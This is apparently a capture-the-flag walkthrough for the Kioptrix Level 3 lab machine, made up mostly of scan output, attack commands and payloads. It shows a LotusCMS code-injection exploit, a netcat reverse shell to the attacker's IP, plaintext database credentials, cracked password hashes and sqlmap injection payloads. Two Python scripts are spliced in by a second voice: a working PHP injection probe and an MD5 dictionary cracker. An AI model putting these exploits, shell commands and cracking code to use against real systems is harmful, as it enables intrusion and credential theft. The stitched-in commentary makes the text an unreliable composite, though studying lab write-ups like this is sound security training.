This document is for educational purposes only; I take no responsibility for other people's actions. This is a review of the Kioptrix Level 3 VM from Vulnhub, a site dedicated to penetration-testing Capture The Flag challenges.
Download the VM from here: https://www.vulnhub.com/entry/kioptrix-level-12-3,24/
Standard scenario; let's try this checklist first:
netdiscover -r 192.168.180.0/24
nmap -sV -T4 -O -F --version-light 192.168.180.139
nmap -sC -sS -T4 -A -v -v -Pn 192.168.180.139
nmap -sC -sU -T4 -A -v -v -Pn --top-ports 200 192.168.180.139
dirb http://192.168.180.139
wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/big.txt --hc 404 http://192.168.180.139/FUZZ
nikto -h 192.168.180.139
In case there is SMB:
smbclient -N -L 192.168.180.139
enum4linux -a 192.168.180.139
netdiscover -r 192.168.180.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240
_____________________________________________________________________________
IP               At MAC Address       Count  Len  MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.180.1    00:50:56:c0:00:08    1      60   VMware, Inc.
192.168.180.2    00:50:56:f9:f6:4a    1      60   VMware, Inc.
192.168.180.139  00:0c:29:e3:3f:e5    1      60   VMware, Inc.
192.168.180.254  00:50:56:ee:9d:40    1      60   VMware, Inc.
nmap -sV -T4 -O -F --version-light 192.168.180.139
Starting Nmap 7.01 ( https://nmap.org ) at 2016-08-15 01:38 EDT
Nmap scan report for 192.168.180.139
Host is up (0.00019s latency).
Not shown: 98 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
MAC Address: 00:0C:29:E3:3F:E5 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.94 seconds
nmap -sC -sS -T4 -A -v -v -Pn 192.168.180.139
Starting Nmap 7.01 ( https://nmap.org ) at 2016-08-15 01:39 EDT
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
| 1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAL4CpDFXD9Zn2ONktcyGQL37Dn6s9JaOv3oKjxfdiABm9GjRkLEtbSAK3vhBBUJTZcVKYZk21lFHAqoe/+pLr4U9yOLOBbSoKNSxQ2VHN9FOLc9C58hKMF/0sjDsSIZnaI4zO7M4HmdEMYXONrmj2x6qczbfqecs+z4cEYVUF3R3AAAAFQCuG9mm7mLm1GGqZRSICZ+omMZkKQAAAIEAnj8NDH48hL+Pp06GWQZOlhte8JRZT5do6n8+bCgRSOvaYLYGoNi/GBzlET6tMSjWMsyhVY/YKTNTXRjqzS1DqbODM7M1GzLjsmGtVlkLoQafV6HJ25JsKPCEzSImjeOCpzwRP5opjmMrYBMjjKqtIlWYpaUijT4uR08tdaTxCukAAACBAJeJ9j2DTugDAy+SLCa0dZCH+jnclNo3o6oINF1FjzICdgDONL2YbBeU3CiAL2BureorAE0lturvvrIC2xVn2vHhrLpz6NPbDAkrLV2/rwoavbCkYGrwXdBHd5ObqBIkoUKbI1hGIGA51nafI2tjoXPfIeHeNOep20hgr32x9x1x
| 2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAyOv6c+5ON+N+ZNDtjetiZ0eUxnIR1U0UqSF+a24Pz2xqdnJC1EN0O3zxGJB3gfPdJlyqUDiozbEth1GBP//8wbWsa1pLJOL1YmcumEJCsitngnrVN7huACG127UjKP8hArECjCHzc1P372gN3AQ/h5aZd0VV17e03HnAJ64ZziOQzVJ+DKWJbiHoXC2cdD1P+nlhK5fULe0QBvmA14gkl2LWA6KILHiisHZpF+V3X7NvXYyCSSI9GeXwhW4RKOCGdGVbjYf7d93K9gj0oU7dHrbdNKgX0WosuhMuXmKleHkIxfyLAILYWrRRj0GVdhZfbI99J3TYaR/yLTpb0D6mhw==
80/tcp open http syn-ack ttl 64 Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-favicon: Unknown favicon MD5: 99EFC00391F142252888403BB1C196D2
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:E3:3F:E5 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
TCP/IP fingerprint:
OS:SCAN(V=7.01%E=4%D=8/15%OT=22%CT=1%CU=34293%PV=Y%DS=1%DC=D%G=Y%M=000C29%T
OS:M=57B155A9%P=i586-pc-linux-gnu)SEQ(SP=CD%GCD=1%ISR=CB%TI=Z%CI=Z%II=I%TS=
OS:7)OPS(O1=M5B4ST11NW5%O2=M5B4ST11NW5%O3=M5B4NNT11NW5%O4=M5B4ST11NW5%O5=M5
OS:B4ST11NW5%O6=M5B4ST11)WIN(W1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=16A
OS:0)ECN(R=Y%DF=Y%T=40%W=16D0%O=M5B4NNSNW5%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S
OS:+%F=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=16A0%S=O%A=S+%F=AS%O=M5B4ST11NW
OS:5%RD=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W
OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
OS:T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%U
OS:N=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Uptime guess: 0.001 days (since Mon Aug 15 01:38:55 2016)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=205 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.18 ms 192.168.180.139
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 01:39
Completed NSE at 01:39, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 01:39
Completed NSE at 01:39, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.48 seconds
Raw packets sent: 1020 (45.626KB) | Rcvd: 1016 (41.346KB)
nmap -sC -sU -T4 -A -v -v -Pn --top-ports 200 192.168.180.139
Nothing interesting from this scan.
dirb http://192.168.180.139
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Aug 15 01:49:58 2016
URL_BASE: http://192.168.180.139/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.180.139/ ----
==> DIRECTORY: http://192.168.180.139/cache/
==> DIRECTORY: http://192.168.180.139/core/
+ http://192.168.180.139/data (CODE:403|SIZE:326)
+ http://192.168.180.139/favicon.ico (CODE:200|SIZE:23126)
==> DIRECTORY: http://192.168.180.139/gallery/
+ http://192.168.180.139/index.php (CODE:200|SIZE:1819)
==> DIRECTORY: http://192.168.180.139/modules/
==> DIRECTORY: http://192.168.180.139/phpmyadmin/
+ http://192.168.180.139/server-status (CODE:403|SIZE:335)
==> DIRECTORY: http://192.168.180.139/style/
---- Entering directory: http://192.168.180.139/cache/ ----
+ http://192.168.180.139/cache/index.html (CODE:200|SIZE:1819)
---- Entering directory: http://192.168.180.139/core/ ----
==> DIRECTORY: http://192.168.180.139/core/controller/
+ http://192.168.180.139/core/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.180.139/core/lib/
==> DIRECTORY: http://192.168.180.139/core/model/
==> DIRECTORY: http://192.168.180.139/core/view/
---- Entering directory: http://192.168.180.139/gallery/ ----
+ http://192.168.180.139/gallery/index.php (CODE:500|SIZE:5650)
==> DIRECTORY: http://192.168.180.139/gallery/photos/
==> DIRECTORY: http://192.168.180.139/gallery/themes/
---- Entering directory: http://192.168.180.139/modules/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.180.139/phpmyadmin/ ----
+ http://192.168.180.139/phpmyadmin/favicon.ico (CODE:200|SIZE:18902)
+ http://192.168.180.139/phpmyadmin/index.php (CODE:200|SIZE:8136)
==> DIRECTORY: http://192.168.180.139/phpmyadmin/js/
==> DIRECTORY: http://192.168.180.139/phpmyadmin/lang/
+ http://192.168.180.139/phpmyadmin/libraries (CODE:403|SIZE:342)
+ http://192.168.180.139/phpmyadmin/phpinfo.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.180.139/phpmyadmin/scripts/
==> DIRECTORY: http://192.168.180.139/phpmyadmin/themes/
---- Entering directory: http://192.168.180.139/style/ ----
+ http://192.168.180.139/style/admin.php (CODE:200|SIZE:356)
+ http://192.168.180.139/style/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.180.139/core/controller/ ----
+ http://192.168.180.139/core/controller/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.180.139/core/lib/ ----
+ http://192.168.180.139/core/lib/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.180.139/core/model/ ----
+ http://192.168.180.139/core/model/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.180.139/core/view/ ----
+ http://192.168.180.139/core/view/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.180.139/gallery/photos/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.180.139/gallery/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.180.139/phpmyadmin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.180.139/phpmyadmin/lang/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.180.139/phpmyadmin/scripts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.180.139/phpmyadmin/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Mon Aug 15 01:50:07 2016
DOWNLOADED: 46120 - FOUND: 17
wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/big.txt --hc 404 http://192.168.180.139/FUZZ
********************************************************
* Wfuzz 2.1.3 - The Web Bruteforcer *
********************************************************
Target: http://192.168.180.139/FUZZ
Total requests: 3036
==================================================================
ID Response Lines Word Chars Request
==================================================================
00489:  C=301   9 L   31 W   357 Ch   "cache"
00692:  C=301   9 L   31 W   356 Ch   "core"
00779:  C=403  10 L   33 W   326 Ch   "data"
02082:  C=301   9 L   31 W   362 Ch   "phpmyadmin"
03035:  C=404   9 L   35 W   324 Ch   "yomama"
^C
Finishing pending requests...
nikto -h 192.168.180.139
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.180.139
+ Target Hostname: 192.168.180.139
+ Target Port: 80
+ Start Time: 2016-08-15 02:01:11 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Cookie PHPSESSID created without the httponly flag
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ Server leaks inodes via ETags, header found with file /favicon.ico, inode: 631780, size: 23126, mtime: Fri Jun 5 15:22:00 2009
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 7534 requests: 0 error(s) and 19 item(s) reported on remote host
+ End Time: 2016-08-15 02:01:22 (GMT-4) (11 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
http://192.168.180.139/phpmyadmin/Documentation.html
phpMyAdmin 2.11.3 Documentation
http://192.168.180.139/phpmyadmin
Welcome to phpMyAdmin 2.11.3deb1ubuntu1.3
http://192.168.180.139/phpmyadmin/changelog.php
2.11.3.0 (2007-12-08)
http://192.168.180.139/index.php?system=Admin
Proudly Powered by: LotusCMS
http://192.168.180.139/gallery/index.php
At this point I added kioptrix3.com to the hosts file.
Did not work:
https://www.exploit-db.com/exploits/15964/
Let's try this one:
https://github.com/Hood3dRob1n/LotusCMS-Exploit
./lotusRCE.sh kioptrix3.com /
Path found, now to check for vuln....
</html>Hood3dRob1n
Regex found, site is vulnerable to PHP Code Injection!
About to try and inject reverse shell....
what IP to use?
192.168.180.132
What PORT?
443
OK, open your local listener and choose the method for back connect:
1) NetCat -e 3) NetCat Backpipe 5) Exit
2) NetCat /dev/tcp 4) NetCat FIFO
#? 1
nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.180.132] from (UNKNOWN) [192.168.180.139] 47705
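What the "Regex found" step of lotusRCE.sh is actually testing, as an added example (my code, not the page's tool and not Hood3dRob1n's script): LotusCMS feeds the page parameter into an eval(), so a POST body that closes the quoted string, runs one PHP statement and comments out the remainder will echo a random marker back into the response when the injection works. The payload shape and the target URL are assumptions written for this example; the marker turning up after the closing </html>, as it does in the page's output, is the signal.

```python
import random
import string
import urllib.parse
import urllib.request

# Assumed target: index.php at the web root, as found on the page.
TARGET = "http://kioptrix3.com/index.php"


def make_marker(length=12):
    """Random letters so the check cannot match text that was already on the page."""
    return "".join(random.choice(string.ascii_letters) for _ in range(length))


def build_payload(marker):
    """URL-encoded POST body.

    The page value lands inside a single-quoted string inside eval():
      index')          closes that string and the call around it,
      ;print("M");     is the injected statement,
      #                comments out the rest of the original line so the
                       eval stays syntactically valid.
    Payload shape assumed from the classic LotusCMS 'page' injection; it is
    not copied from lotusRCE.sh.
    """
    php = "index');print(\"%s\");#" % marker
    return urllib.parse.urlencode({"page": php})


def injected(body, marker):
    """True only if the injected print() ran server-side."""
    return marker in body


def probe(url=TARGET, timeout=10.0):
    """Send the probe and report whether the marker came back (network call)."""
    marker = make_marker()
    req = urllib.request.Request(url, data=build_payload(marker).encode(), method="POST")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return injected(resp.read().decode(errors="replace"), marker)


if __name__ == "__main__":
    print("vulnerable to PHP code injection" if probe() else "marker not reflected")
```

A random marker matters: grepping for a fixed word such as the script's author handle would also match any page that happens to contain it, so a one-off token keeps the check from producing false positives.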
ps -aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.3 2844 1692 ? Ss 04:33 0:00 /sbin/init
root 2 0.0 0.0 0 0 ? S< 04:33 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S< 04:33 0:00 [migration/0]
root 4 0.0 0.0 0 0 ? S< 04:33 0:00 [ksoftirqd/0]
root 5 0.0 0.0 0 0 ? S< 04:33 0:00 [watchdog/0]
root 6 0.0 0.0 0 0 ? S< 04:33 0:00 [events/0]
root 7 0.0 0.0 0 0 ? S< 04:33 0:00 [khelper]
root 41 0.0 0.0 0 0 ? S< 04:33 0:00 [kblockd/0]
root 44 0.0 0.0 0 0 ? S< 04:33 0:00 [kacpid]
root 45 0.0 0.0 0 0 ? S< 04:33 0:00 [kacpi_notify]
root 104 0.0 0.0 0 0 ? S< 04:33 0:00 [kseriod]
root 143 0.0 0.0 0 0 ? S 04:33 0:00 [pdflush]
root 144 0.0 0.0 0 0 ? S 04:33 0:00 [pdflush]
root 145 0.0 0.0 0 0 ? S< 04:33 0:00 [kswapd0]
root 187 0.0 0.0 0 0 ? S< 04:33 0:00 [aio/0]
root 1272 0.0 0.0 0 0 ? S< 04:33 0:00 [ata/0]
root 1275 0.0 0.0 0 0 ? S< 04:33 0:00 [ata_aux]
root 1284 0.0 0.0 0 0 ? S< 04:33 0:00 [scsi_eh_0]
root 1287 0.0 0.0 0 0 ? S< 04:33 0:00 [scsi_eh_1]
root 2208 0.0 0.0 0 0 ? S< 04:33 0:00 [kjournald]
root 2364 0.0 0.1 2224 664 ? S<s 04:34 0:00 /sbin/udevd --daemon
root 2732 0.0 0.0 0 0 ? S< 04:34 0:00 [kpsmoused]
root 3864 0.0 0.1 1716 516 tty4 Ss+ 04:34 0:00 /sbin/getty 38400 tty4
root 3865 0.0 0.0 1716 512 tty5 Ss+ 04:34 0:00 /sbin/getty 38400 tty5
root 3869 0.0 0.1 1716 516 tty2 Ss+ 04:34 0:00 /sbin/getty 38400 tty2
root 3870 0.0 0.1 1716 516 tty3 Ss+ 04:34 0:00 /sbin/getty 38400 tty3
root 3872 0.0 0.1 1716 516 tty6 Ss+ 04:34 0:00 /sbin/getty 38400 tty6
syslog 3913 0.0 0.1 1936 644 ? Ss 04:34 0:00 /sbin/syslogd -u syslog
root 3932 0.0 0.1 1872 548 ? S 04:34 0:00 /bin/dd bs=1 if=/proc/kmsg of=/var/run/klogd/kmsg
klog 3934 0.0 0.3 3028 1856 ? Ss 04:34 0:00 /sbin/klogd -P /var/run/klogd/kmsg
root 3959 0.0 0.1 5316 1020 ? Ss 04:34 0:00 /usr/sbin/sshd
root 4015 0.0 0.1 1772 524 ? S 04:34 0:00 /bin/sh /usr/bin/mysqld_safe
mysql 4057 0.0 3.2 127228 16668 ? Sl 04:34 0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock
root 4059 0.0 0.1 1700 552 ? S 04:34 0:00 logger -p daemon.err -t mysqld_safe -i -t mysqld
daemon 4123 0.0 0.0 1984 420 ? Ss 04:34 0:00 /usr/sbin/atd
root 4142 0.0 0.1 2104 892 ? Ss 04:34 0:00 /usr/sbin/cron
root 4165 0.0 1.2 20780 6392 ? Ss 04:34 0:00 /usr/sbin/apache2 -k start
www-data 4184 0.0 1.2 21272 6604 ? S 04:34 0:00 /usr/sbin/apache2 -k start
www-data 4185 0.0 1.5 22032 7852 ? S 04:34 0:00 /usr/sbin/apache2 -k start
www-data 4186 0.0 1.4 21732 7332 ? S 04:34 0:00 /usr/sbin/apache2 -k start
www-data 4187 0.0 1.6 22280 8364 ? S 04:34 0:00 /usr/sbin/apache2 -k start
www-data 4188 0.0 1.3 21308 6996 ? S 04:34 0:00 /usr/sbin/apache2 -k start
dhcp 4201 0.0 0.1 2440 764 ? Ss 04:34 0:00 dhclient
root 4208 0.0 0.0 1716 508 tty1 Ss+ 04:34 0:00 /sbin/getty 38400 tty1
www-data 4209 0.0 1.2 21304 6692 ? S 04:37 0:00 /usr/sbin/apache2 -k start
www-data 4240 0.0 1.2 21272 6624 ? S 04:51 0:00 /usr/sbin/apache2 -k start
www-data 4241 0.0 1.3 21404 6736 ? S 04:51 0:00 /usr/sbin/apache2 -k start
www-data 4242 0.0 1.6 22560 8304 ? S 04:51 0:00 /usr/sbin/apache2 -k start
www-data 4254 0.0 1.2 21280 6612 ? S 04:51 0:00 /usr/sbin/apache2 -k start
www-data 4326 0.0 0.0 1772 488 ? S 05:45 0:00 sh -c nc -e /bin/sh 192.168.180.132 443
www-data 4327 0.0 0.0 1772 488 ? R 05:45 0:00 sh
www-data 4328 0.0 0.1 2364 920 ? R 05:46 0:00 ps -aux
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
loneferret:x:1000:100:loneferret,,,:/home/loneferret:/bin/bash
dreg:x:1001:1001:Dreg Gevans,0,555-5566,:/home/dreg:/bin/rbash
ls -la /home/loneferret/
total 64
drwxr-xr-x 3 loneferret loneferret 4096 Apr 17 2011 .
drwxr-xr-x 5 root root 4096 Apr 16 2011 ..
-rw-r--r-- 1 loneferret users 13 Apr 18 2011 .bash_history
-rw-r--r-- 1 loneferret loneferret 220 Apr 11 2011 .bash_logout
-rw-r--r-- 1 loneferret loneferret 2940 Apr 11 2011 .bashrc
-rw------- 1 root root 15 Apr 15 2011 .nano_history
-rw-r--r-- 1 loneferret loneferret 586 Apr 11 2011 .profile
drwx------ 2 loneferret loneferret 4096 Apr 14 2011 .ssh
-rw-r--r-- 1 loneferret loneferret 0 Apr 11 2011 .sudo_as_admin_successful
-rw-r--r-- 1 root root 224 Apr 16 2011 CompanyPolicy.README
-rwxrwxr-x 1 root root 26275 Jan 12 2011 checksec.sh
A sudo user (note .sudo_as_admin_successful).
cat CompanyPolicy.README
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.
DG
CEO
cat /etc/issue
DISCLAIMER!
We at Kioptrix are not responsible for any damaged directly, or indirectly,
caused by using this system. We suggest you do not connect this installation
to the Internet. It is, after all, a vulnerable setup.
Please keep this in mind when playing the game.
This machine is setup to use DHCP.
Before playing the game, please modify your attacker's hosts file.
<ip> kioptrix3.com
This challenge contains a Web Application.
If you have any questions, please direct them to:
comms[at]kioptrix.com
Hope you enjoy this challenge.
-Kioptrix Team
Ubuntu 8.04.3 LTS \n \l
cat /etc/debian_version
lenny/sid
uname -a
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux
Something I missed at first: the gallery config (Gallarific's gconfig.php) holds the MySQL root credentials in clear text:
cat gconfig.php
<?php
error_reporting(0);
/*
A sample Gallarific configuration file. You should edit
the installer details below and save this file as gconfig.php
Do not modify anything else if you don't know what it is.
*/
// Installer Details -----------------------------------------------
// Enter the full HTTP path to your Gallarific folder below,
// such as http://www.yoursite.com/gallery
// Do NOT include a trailing forward slash
$GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery";
$GLOBALS["gallarific_mysql_server"] = "localhost";
$GLOBALS["gallarific_mysql_database"] = "gallery";
$GLOBALS["gallarific_mysql_username"] = "root";
$GLOBALS["gallarific_mysql_password"] = "fuckeyou";
http://kioptrix3.com/phpmyadmin/
With the root credentials from gconfig.php, log in and run:
SELECT * FROM `dev_accounts` WHERE 1 LIMIT 0 , 30
id  username    password                          cracked
1   dreg        0d3eccfb887aabd50f243b3f155c0f85  <- Mast3r
2   loneferret  5badcaf789d3d1d09794d8f021f40f0e  <- starwars
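The two cracked values next to the hashes come from a plain dictionary attack: the dev_accounts passwords are unsalted MD5, so hashing each wordlist entry once and comparing is all it takes (sqlmap does the same thing later on this page). The example below is added here and is not the page's code; the six-word wordlist is constructed to stand in for rockyou.txt, and the optional suffix list mirrors sqlmap's "common password suffixes" prompt.

```python
import hashlib

# Hashes as dumped from gallery.dev_accounts on the page.
DEV_ACCOUNTS = {
    "dreg": "0d3eccfb887aabd50f243b3f155c0f85",
    "loneferret": "5badcaf789d3d1d09794d8f021f40f0e",
}

# Constructed mini wordlist standing in for /usr/share/wordlists/rockyou.txt.
WORDLIST = ["password", "123456", "starwars", "letmein", "Mast3r", "admin"]


def md5_hex(word):
    return hashlib.md5(word.encode()).hexdigest()


def looks_like_md5(h):
    """32 hex characters: the shape that made sqlmap pick 'md5_generic_passwd'."""
    return len(h) == 32 and all(c in "0123456789abcdef" for c in h.lower())


def crack(hashes, words, suffixes=("",)):
    """Reverse lookup: hash each candidate once, match it against every target.

    hashes:   {username: md5hex}
    words:    any iterable of candidate passwords (a file handle works)
    suffixes: extra strings appended to each word, e.g. ("", "1", "123")
    Returns {username: recovered_password} for the hashes that matched.
    """
    wanted = {}
    for user, h in hashes.items():
        if looks_like_md5(h):
            wanted.setdefault(h.lower(), []).append(user)
    total = sum(len(users) for users in wanted.values())

    cracked = {}
    for word in words:
        for suffix in suffixes:
            candidate = word + suffix
            for user in wanted.get(md5_hex(candidate), ()):
                cracked[user] = candidate
        if len(cracked) == total:   # stop early once every hash is recovered
            break
    return cracked


def crack_from_file(path, hashes=DEV_ACCOUNTS, suffixes=("",)):
    """Stream a real wordlist (one candidate per line) through crack()."""
    with open(path, errors="ignore") as fh:
        return crack(hashes, (line.rstrip("\n") for line in fh), suffixes)


if __name__ == "__main__":
    for user, password in crack(DEV_ACCOUNTS, WORDLIST).items():
        print("%s: %s" % (user, password))
```

Because the hashes are unsalted, one hash computation per candidate serves every target at once; with salts (or a slow KDF) the cost would scale with the number of accounts as well as the wordlist, which is the whole point of salting.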
Something even easier, which I found in other writeups: let sqlmap do the extraction.
sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" -p id --dbs
sqlmap 1.0-dev-nongit-201606170a89 (http://sqlmap.org)
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 04:04:27
[04:04:27] [INFO] resuming back-end DBMS 'mysql'
[04:04:27] [INFO] testing connection to the target URL
[04:04:27] [INFO] heuristics detected web page charset 'ISO-8859-2'
[04:04:27] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
[04:04:27] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: id=-9800 OR 6056=6056#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=1 AND (SELECT 1889 FROM(SELECT COUNT(*),CONCAT(0x716a767a71,(SELECT (ELT(1889=1889,1))),0x71766a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))ZmZi)
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
